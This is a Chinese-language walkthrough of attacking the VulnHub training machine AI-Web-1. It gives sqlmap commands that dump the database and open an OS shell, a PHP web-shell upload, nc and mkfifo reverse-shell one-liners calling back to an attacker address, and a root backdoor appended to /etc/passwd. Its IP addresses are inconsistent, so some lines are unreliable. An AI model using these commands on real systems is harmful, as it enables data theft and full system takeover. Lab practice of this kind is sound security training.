Ai-Web1靶机渗透

靶机下载：

官网地址：https://www.vulnhub.com/entry/ai-web-1,353/

攻击机：kali2024

一、信息收集

发下目标主机的IP为：192.168.201.141

用nmap工具扫描一下对方主机和服务

发现他打开了80端口

发现搜不到于是我们用工具去扫描一下

我们发现了两个目录，于是我们去访问一下

我们再去扫一下另一个路径，我们看到了一个php文件

二、sql注入

这里我们尝试一下是否存在sql注入

我们用burp抓一下包

这里我们知道了他要上传的地方，我们可以利用sqlmap进行脱库

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit"  --dbs #列出库
 

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 --tables #列出表

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 -T user --columns #列出字段

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  --level=3 --os-shell #
 

选择php(default)，custom location(s) 

输入获取到的绝对路径：/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

三、文件上传

首先我们写一个一句话木马

四、反弹shell

1、kali本地监听：nc -lvvp 6666（或者nc -lnvp）

2、蚁剑终端上nc反弹：nc -e /bin/bash 192.168.201.136 6666（发现-e参数不可用）

3、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.141 6666 >/tmp/f

4、python -c "import pty;pty.spawn('/bin/bash')"（python写交互）

五、提权

searchsploit linux kernel 4.15.0-58-generic 搜一下相关的内核漏洞发现没有可以利用的 文件

openssl passwd -1 -salt admin 123456

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /etc/passwd